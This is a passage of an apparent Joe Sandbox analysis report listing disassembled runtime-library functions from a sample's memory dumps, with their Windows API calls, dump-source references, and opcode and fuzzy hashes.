                                                                                                                                                                                                                        • API ID: Message$ErrorFileFormatLastModuleName
                                                                                                                                                                                                                        • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                                        • API String ID: 517058245-2863816727
                                                                                                                                                                                                                        • Opcode ID: 4333ea13b7f7892cb13c7834fe0fbc8b7cb0659b0560af6bfa7ef98de9a8054c
                                                                                                                                                                                                                        • Instruction ID: 0f81f02dffbc7e94dbb5e455ace8814c6d5a9a29eb591cf29e7583a9ea660d47
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4333ea13b7f7892cb13c7834fe0fbc8b7cb0659b0560af6bfa7ef98de9a8054c
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A2218051B0858291EE21BF21EC913FAA270FF48354FCA113ED65D876E7EE2CD104AB24
                                                                                                                                                                                                                        Function 00007FF72935EC9C Relevance: 6.2, APIs: 4, Instructions: 162COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 1022 7ff72935ec9c-7ff72935ecd8 1023 7ff72935ee8e-7ff72935ee99 call 7ff7293543f4 1022->1023 1024 7ff72935ecde-7ff72935ece7 1022->1024 1030 7ff72935ee9d-7ff72935eeb9 call 7ff72934b870 1023->1030 1024->1023 1025 7ff72935eced-7ff72935ecf6 1024->1025 1025->1023 1027 7ff72935ecfc-7ff72935ecff 1025->1027 1027->1023 1029 7ff72935ed05-7ff72935ed16 1027->1029 1031 7ff72935ed18-7ff72935ed21 call 7ff72935ec40 1029->1031 1032 7ff72935ed40-7ff72935ed44 1029->1032 1031->1023 1040 7ff72935ed27-7ff72935ed2a 1031->1040 1032->1023 1036 7ff72935ed4a-7ff72935ed4e 1032->1036 1036->1023 1037 7ff72935ed54-7ff72935ed58 1036->1037 1037->1023 1039 7ff72935ed5e-7ff72935ed6e call 7ff72935ec40 1037->1039 1045 7ff72935ed77 call 7ff7293654a4 1039->1045 1046 7ff72935ed70-7ff72935ed73 1039->1046 1040->1023 1042 7ff72935ed30-7ff72935ed33 1040->1042 1042->1023 1044 7ff72935ed39 1042->1044 1044->1032 1049 7ff72935ed7c-7ff72935ed93 call 7ff7293648a8 1045->1049 1046->1045 1047 7ff72935ed75 1046->1047 1047->1045 1052 7ff72935eeba-7ff72935eecf call 7ff729359c10 1049->1052 1053 7ff72935ed99-7ff72935eda4 call 7ff7293648d8 1049->1053 1053->1052 1058 7ff72935edaa-7ff72935edb5 call 7ff729364908 1053->1058 1058->1052 1061 7ff72935edbb-7ff72935ee4f 1058->1061 1062 7ff72935ee89-7ff72935ee8c 1061->1062 1063 7ff72935ee51-7ff72935ee6d 1061->1063 1062->1030 1064 7ff72935ee84-7ff72935ee87 1063->1064 1065 7ff72935ee6f-7ff72935ee73 1063->1065 1064->1030 1065->1064 1066 7ff72935ee75-7ff72935ee80 call 7ff7293654e8 1065->1066 1066->1064
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1741948678.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1741917111.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1741994437.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1742030379.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1742030379.00007FF729383000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1742100175.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 4170891091-0
                                                                                                                                                                                                                        • Opcode ID: 8f9731ccc05e5e98dab1658fcebd939f282d40e9b6d5561daf5942648b351509
                                                                                                                                                                                                                        • Instruction ID: eea14aaa41073d114cefd73773e344f58d4d1c3f3467adf1189816e022a42f97
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8f9731ccc05e5e98dab1658fcebd939f282d40e9b6d5561daf5942648b351509
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F6510772F181116AEB24EF649DC56BCABF1EB08358F98413DDD1D52AE6DB38A401DB10
                                                                                                                                                                                                                        Function 00007FFBABA66110 Relevance: 6.1, APIs: 4, Instructions: 129COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1742869199.00007FFBABA51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFBABA50000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1742839723.00007FFBABA50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1742961864.00007FFBABB05000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1743007698.00007FFBABB3F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1743043071.00007FFBABB42000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ffbaba50000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ErrorLast$__security_init_cookie
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2222513578-0
                                                                                                                                                                                                                        • Opcode ID: 51a1c68c6362424b61c1acff22cfa8e2821de0ade73df4afb968f174aaff75c0
                                                                                                                                                                                                                        • Instruction ID: a60da8b89300a851fa4b7112b1de812249ee005cf065443a35af8de06f0fd4ff
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 51a1c68c6362424b61c1acff22cfa8e2821de0ade73df4afb968f174aaff75c0
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 395149E4E0F64342FA5B6738D9A46B96181AF447A0F54E239DD3E476F7EE3DB8418200
                                                                                                                                                                                                                        Function 00007FF729354A8C Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1741948678.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1741917111.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1741994437.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1742030379.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1742030379.00007FF729383000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1742100175.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2780335769-0
                                                                                                                                                                                                                        • Opcode ID: 26d7b7321f63d0f75eae76757bf07adbfaa4e90fbb1b3f47974b354d61199844
                                                                                                                                                                                                                        • Instruction ID: 280a6f9ad3ff824ad9c5e831a12fc1086dd078b1ae1a5cbbf0e7c0cffb58e2ac
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 26d7b7321f63d0f75eae76757bf07adbfaa4e90fbb1b3f47974b354d61199844
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1E519032A086419AFB18EF71D8843BDABF1EB4C768F594038DE4D6764ADF38D4419B20
                                                                                                                                                                                                                        Function 00007FF729354938 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1741948678.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1741917111.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1741994437.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1742030379.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1742030379.00007FF729383000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1742100175.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1279662727-0
                                                                                                                                                                                                                        • Opcode ID: c9c3dc0ca6ff3025a18f37416ed5252826b5e2a6b8668c561ba6737191909872
                                                                                                                                                                                                                        • Instruction ID: be34d7c04a9aab22bf853de25ec8659ca04069d058bad59f338a14b6e22dd45c
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c9c3dc0ca6ff3025a18f37416ed5252826b5e2a6b8668c561ba6737191909872
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D041C522D1878153F358AF619984379B670FB9C764F549338D65C13AD6DF7CA0E09B20
                                                                                                                                                                                                                        Function 00007FFBABA66FD0 Relevance: 3.8, APIs: 3, Instructions: 72COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1742869199.00007FFBABA51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFBABA50000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1742839723.00007FFBABA50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1742961864.00007FFBABB05000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1743007698.00007FFBABB3F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1743043071.00007FFBABB42000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ffbaba50000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ErrorLast
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1452528299-0
                                                                                                                                                                                                                        • Opcode ID: 6b4fdf962c8d231f1478f013950a70e71442974e5fb203732b388d25e7008839
                                                                                                                                                                                                                        • Instruction ID: 2f5f9e7867b81d54c6668bd2068fc62835d10274b0576bf4a3d46a668a11f0d0
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6b4fdf962c8d231f1478f013950a70e71442974e5fb203732b388d25e7008839
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 05215CE4E1F60392FA5B6734E5A167951566F44760F15A738DC3E066F7FD3EB8004210
                                                                                                                                                                                                                        Function 00007FF72934F45C Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1741948678.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1741917111.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1741994437.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1742030379.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1742030379.00007FF729383000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1742100175.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                        • Opcode ID: 304c800bfc18b22a295e41f2f803514c44f0a5a87c6028a89610e4dcef950876
                                                                                                                                                                                                                        • Instruction ID: c6e02600ad0b48cd9ecdb11a8e9c48b8fce71e19cd3e096fb75d6c021016f7c0
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 304c800bfc18b22a295e41f2f803514c44f0a5a87c6028a89610e4dcef950876
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EA51C961B0924246F628BD269C8067AA6E1EF44BB4F9D573CDD6D877D7CE3CD400AE20
                                                                                                                                                                                                                        Function 00007FF72935B444 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1741948678.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1741917111.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1741994437.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1742030379.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1742030379.00007FF729383000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1742100175.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2976181284-0
                                                                                                                                                                                                                        • Opcode ID: cd3a9f3ea8ef265e1697b25d2233ff7099ae2ab5e22e5ab4fa41e006c1c379b1
                                                                                                                                                                                                                        • Instruction ID: 8c37a28151faca12675f895c2d61649b76157cf6ebd99c7295ff386ec2627623
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cd3a9f3ea8ef265e1697b25d2233ff7099ae2ab5e22e5ab4fa41e006c1c379b1
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2E11B6A1618A8191DA20AF25A8841A9A771FB48BF4F98033DEE7D077E6CE3CD4519B00
                                                                                                                                                                                                                        Function 00007FF729354C34 Relevance: 3.0, APIs: 2, Instructions: 40timeCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF729354B49), ref: 00007FF729354C67
                                                                                                                                                                                                                        • SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF729354B49), ref: 00007FF729354C7D
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1741948678.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1741917111.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1741994437.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1742030379.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1742030379.00007FF729383000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1742100175.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Time$System$FileLocalSpecific
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1707611234-0
                                                                                                                                                                                                                        • Opcode ID: 5814b874014510fcf00941fef2b2171ed045486f006683dc2ae422325307d6da
                                                                                                                                                                                                                        • Instruction ID: 6a08182358eabe176f538bf3ffe303caed076fd44f2643ecea85e8bcb53b1cec
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5814b874014510fcf00941fef2b2171ed045486f006683dc2ae422325307d6da
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4D11822160C65291EA646F11A88107EF7B0FB89775F94023DE6AD419D5EF2CD014EF10
                                                                                                                                                                                                                        Function 00007FF729359C58 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • RtlFreeHeap.NTDLL(?,?,?,00007FF729362032,?,?,?,00007FF72936206F,?,?,00000000,00007FF729362535,?,?,?,00007FF729362467), ref: 00007FF729359C6E
                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF729362032,?,?,?,00007FF72936206F,?,?,00000000,00007FF729362535,?,?,?,00007FF729362467), ref: 00007FF729359C78
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1741948678.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1741917111.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1741994437.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1742030379.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1742030379.00007FF729383000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1742100175.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 485612231-0
                                                                                                                                                                                                                        • Opcode ID: 9fa0b27d1784483699343fce5d0d8fb71a2fef38db5c10c130c8b92919593777
                                                                                                                                                                                                                        • Instruction ID: 4a20c70ed96bda16d3438f8c1caf9c95fcdb624dd338c68b5f1e8cbcd8da4b8d
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9fa0b27d1784483699343fce5d0d8fb71a2fef38db5c10c130c8b92919593777
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 90E04F10F0C64252FB087FB2ACC407996B1DF9C700BC8403CC90D42263DE2C64556E30
                                                                                                                                                                                                                        Function 00007FF729359E68 Relevance: 2.6, APIs: 2, Instructions: 59COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • CloseHandle.KERNELBASE(?,?,?,00007FF729359CE5,?,?,00000000,00007FF729359D9A), ref: 00007FF729359ED6
                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF729359CE5,?,?,00000000,00007FF729359D9A), ref: 00007FF729359EE0
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1741948678.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1741917111.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1741994437.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1742030379.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1742030379.00007FF729383000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1742100175.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 918212764-0
                                                                                                                                                                                                                        • Opcode ID: 65da2f67be20623dd6870cbeabcb199f1b77c363b63baf0d8a802715797da709
                                                                                                                                                                                                                        • Instruction ID: b8b1ec5e789aee38a899fd223cf23f19faa55d8a4151d2d5b6558bd55907ee9a
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 65da2f67be20623dd6870cbeabcb199f1b77c363b63baf0d8a802715797da709
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D1218311B1C64251FE647B61ACC42799AB2DF8C7A0FDC423DD92E477D3DE6CA440AB21
                                                                                                                                                                                                                        Function 00007FFBABA5DCF0 Relevance: 2.6, APIs: 2, Instructions: 50memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FFBABA634C9,?,?,?,00007FFBABAA39B1,?,?,?,?,00007FFBABA678EA,?,?,?), ref: 00007FFBABA5DD38
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1742869199.00007FFBABA51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFBABA50000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1742839723.00007FFBABA50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1742961864.00007FFBABB05000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1743007698.00007FFBABB3F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1743043071.00007FFBABB42000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ffbaba50000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AllocHeap
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 4292702814-0
                                                                                                                                                                                                                        • Opcode ID: 27d2ecc8a82d26b6ee3a94a029cf6d96569e999f53c42dbd91e108040fe652f2
                                                                                                                                                                                                                        • Instruction ID: 6615fab3db65c430f19e7b8eae81808f613329bb2b1bf06a94c16e764f7d9fe9
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 27d2ecc8a82d26b6ee3a94a029cf6d96569e999f53c42dbd91e108040fe652f2
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A81182E1B0B74389FE668B75D810A795290EF84B90F48D238DD7E573E5EE2CA4548610
                                                                                                                                                                                                                        Function 00007FF72935B1BC Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1741948678.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1741917111.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1741994437.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1742030379.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1742030379.00007FF729383000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1742100175.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                        • Opcode ID: aa739a885bc1dd54b6575df94a709b393c0322d321e92581108345db9e2bb901
                                                                                                                                                                                                                        • Instruction ID: c06b4f5eb03323728e8ad319b8ec4d4765fe35711d346365fe1e139f3da35b54
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: aa739a885bc1dd54b6575df94a709b393c0322d321e92581108345db9e2bb901
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FF41D67290820597EA64AF15E9811BDBBB0EB5D780F98013DD68E87692CF3CE502DB71
                                                                                                                                                                                                                        Function 00007FF7293476A0 Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1741948678.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1741917111.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1741994437.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1742030379.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1742030379.00007FF729383000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1742100175.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _fread_nolock
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 840049012-0
                                                                                                                                                                                                                        • Opcode ID: effebdf40553d27c0e81468e1b960312edce0ee9f3a62e67a74074871487ffbb
                                                                                                                                                                                                                        • Instruction ID: b810fba91bd1003f04f5cef5b963fc6d4ea8f01e3910d75e9d03e0bfb16dea02
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: effebdf40553d27c0e81468e1b960312edce0ee9f3a62e67a74074871487ffbb
